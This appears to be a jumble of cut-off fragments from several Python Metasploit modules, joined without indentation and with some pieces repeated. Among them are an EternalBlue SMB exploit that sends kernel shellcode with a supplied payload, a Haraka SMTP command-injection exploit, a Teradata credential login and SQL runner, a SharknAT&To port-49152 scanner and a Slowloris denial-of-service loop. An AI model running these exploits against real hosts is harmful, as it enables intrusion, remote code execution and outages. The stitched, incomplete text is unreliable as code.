logging.error('Python Teradata module missing, cannot continue')
return
# Set variables to current RHOST, and USERNAME and PASSWORD options
host = args['rhost']
user = args['username']
password = args['password']
# Perform login attempt
module.log(host + ' - ' + user + ':' + password + ' - Starting')
try:
session = udaExec.connect(method="odbc", system=host, username=user, password=password);
except teradata.api.Error as e:
logging.error(user + ':' + password + ' - ' + format(e))
return
else:
module.log(host + ' - ' + user + ':' + password + ' - Login Successful', level='good')
try:
query = args['sql']
module.log(host + ' - Starting - ' + query)
for row in session.execute(query):
outputRow=str(row)
module.log(host + ' - ' + outputRow, level='good')
except teradata.api.Error as e:
logging.error(format(e))
return
if __name__ == '__main__':
module.run(metadata, run)
from pathlib import Path
import sys
import traceback
try:
from metasploit import module
spec = importlib.util.spec_from_file_location(
"service_ping",
Path(__file__).absolute().parents[2] / "cotopaxi" / "service_ping.py",
)
service_ping = importlib.util.module_from_spec(spec)
spec.loader.exec_module(service_ping)
except ImportError as exc:
module.log("Error: {}".format(traceback.format_exc()), "error")
sys.exit("Error: {}".format(traceback.format_exc()), "error")
MODULE_PROTOCOL = "SSDP"
METADATA = service_ping.prepare_metadata_ping(MODULE_PROTOCOL)
def run(args):
"""Execute wrapper using provided arguments."""
args["PROTOCOLS"] = MODULE_PROTOCOL
service_ping.run(args)
if __name__ == "__main__":
module.run(METADATA, run)
rport = int(args['RPORT'])
numGroomConn = int(args['GroomAllocations'])
smbuser = args['SMBUser'] if 'SMBUser' in args else ''
smbpass = args['SMBPass'] if 'SMBPass' in args else ''
# XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload
sc = eternalblue_kshellcode_x64 + b64decode(args['payload_encoded'])
if len(sc) > 0xe80:
module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')
sys.exit(1)
# Now, shellcode is known. create a feaList
feaList = createFeaList(len(sc))
module.log('shellcode size: {:d}'.format(len(sc)))
module.log('numGroomConn: {:d}'.format(numGroomConn))
try:
_exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)
# XXX: Catch everything until we know better
except Exception as e:
module.log(str(e), 'error')
sys.exit(1)
module.log('done')
if __name__ == '__main__':
module.run(metadata, exploit)
c = smtplib.SMTP()
try:
(code, banner) = c.connect(args['rhost'], int(args['rport']))
except:
return 'unknown'
c.quit()
if code == 220 and 'Haraka' in banner:
versions = re.findall('(\d+\.\d+\.\d+)', banner)
if versions:
if StrictVersion(versions[0]) < StrictVersion('2.8.9'):
return 'appears'
else:
return 'safe'
else:
return 'detected'
elif code == 220:
return 'detected'
else:
return 'unknown'
def exploit(args):
send_mail(args['email_to'], args['rhost'], args['command'],
args['email_from'], int(args['rport']))
if __name__ == '__main__':
module.run(metadata, exploit, soft_check=check_banner)
'required': True,
'default': None
},
'rport': {
'type': 'port',
'description': 'The target port',
'required': True,
'default': 49152
},
},
'notes': {
'AKA': ['SharknAT&To', 'sharknatto']
}
}
def report_wproxy(target, response):
# We don't use the response here, but if we were a banner scraper we could
# print or report it
module.report_vuln(target[0], 'wproxy', port=target[0])
if __name__ == "__main__":
study = probe_scanner.make_scanner(
# Payload and pattern are given and applied straight to the socket, so
# they need to be bytes-like
payload=b'\x2a\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00',
pattern=b'^\\*\xce.{3}$',
onmatch=report_wproxy)
module.run(metadata, study)
try:
module.log("Creating socket number %s" % i, 'debug')
s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)
except socket.error:
break
list_of_sockets.append(s)
while True:
module.log("Sending keep-alive headers... Socket count: %s" % len(list_of_sockets), 'info')
for s in list(list_of_sockets):
try:
s.send("{}: {}\r\n".format(create_random_header_name(random.randint(8, 16)),
random.randint(1, 5000)).encode("utf-8"))
except socket.error:
list_of_sockets.remove(s)
for _ in range(socket_count - len(list_of_sockets)):
module.log("Recreating socket...", 'debug')
try:
s = init_socket(host, port, use_ssl=use_ssl, rand_user_agent=rand_user_agent)
if s:
list_of_sockets.append(s)
except socket.error:
break
time.sleep(delay)
if __name__ == "__main__":
module.run(metadata, run)
return(z1.read())
def check_banner(args):
module.log('{}:{} Starting banner check for Haraka < 2.8.9'.format(args['rhost'], args['rport']), level='debug')
c = smtplib.SMTP()
(code, banner) = c.connect(args['rhost'], int(args['rport']))
c.quit()
if code == 220 and 'Haraka' in banner:
versions = re.findall('(\d+\.\d+\.\d+)', banner)
if versions:
if StrictVersion(versions[0]) < StrictVersion('2.8.9'):
return 'appears'
else:
return 'safe'
else:
return 'detected'
elif code == 220:
return 'detected'
else:
return 'unknown'
def exploit(args):
send_mail(args['email_to'], args['rhost'], args['command'], args['email_from'], int(args['rport']))
if __name__ == '__main__':
module.run(metadata, exploit, soft_check=check_banner)
'references': [
{'type': 'cve', 'ref': '2017-14117'},
{'type': 'url', 'ref': 'https://www.nomotion.net/blog/sharknatto/'},
{'type': 'url', 'ref': 'https://blog.rapid7.com/2017/09/07/measuring-sharknat-to-exposures/#vulnerability5port49152tcpexposure'},
{'type': 'aka', 'ref': 'SharknAT&To'},
{'type': 'aka', 'ref': 'sharknatto'}
],
'type': 'scanner.multi',
'options': {
'rhosts': {'type': 'address_range', 'description': 'The target address', 'required': True, 'default': None},
'rport': {'type': 'port', 'description': 'The target port', 'required': True, 'default': 49152},
},
}
def report_wproxy(target, response):
# We don't use the response here, but if we were a banner scraper we could
# print or report it
module.report_vuln(target[0], 'wproxy', port=target[0])
if __name__ == "__main__":
study = probe_scanner.make_scanner(
# Payload and pattern are given and applied straight to the socket, so
# they need to be bytes-like
payload=b'\x2a\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00',
pattern=b'^\\*\xce.{3}$',
onmatch=report_wproxy
)
module.run(metadata, study)
